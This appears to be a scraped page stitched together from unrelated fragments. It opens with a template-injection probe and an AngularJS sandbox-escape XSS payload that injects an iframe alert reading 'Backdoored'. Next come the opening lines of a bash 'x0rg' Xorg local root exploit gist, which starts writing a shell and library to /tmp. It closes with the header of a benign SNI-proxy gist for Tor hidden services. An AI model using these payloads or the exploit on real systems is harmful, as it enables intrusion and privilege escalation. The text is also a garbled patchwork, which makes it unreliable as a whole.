{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # x0rg - Xorg Local Root Exploit | |
| # Released under the Snitches Get Stitches Public Licence. | |
| # props to prdelka / fantastic for the shadow vector. | |
| # Gr33tz to everyone in #lizardhq and elsewhere <3 | |
| # ~infodox (25/10/2018) | |
| # FREE LAURI LOVE! | |
| echo "x0rg" | |
| echo "[+] First, we create our shell and library..." | |
| cat << EOF > /tmp/libhax.c |
DonnchaC
/ sni-proxy.py
Last active
May 12, 2019 11:54
This is a proof-of-concept tool which demonstrates transparent proxying of SSL connections from an entry server to a hidden servce with end-to-end encryption. The SNI extension in the SSL ClientHello is used to determine the destination. Further info in the Tor2web ticket: https://github.com/globaleaks/Tor2web/issues/252
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Proxy an SSL connection to a Twisted endpoint based on the SNI extension | |
| Allows for end-to-end encrypted connections from a browser to a Tor hidden | |
| service. | |
| Proxy code based on | |
| http://blog.laplante.io/2013/08/a-basic-man-in-the-middle-proxy-with-twisted/ |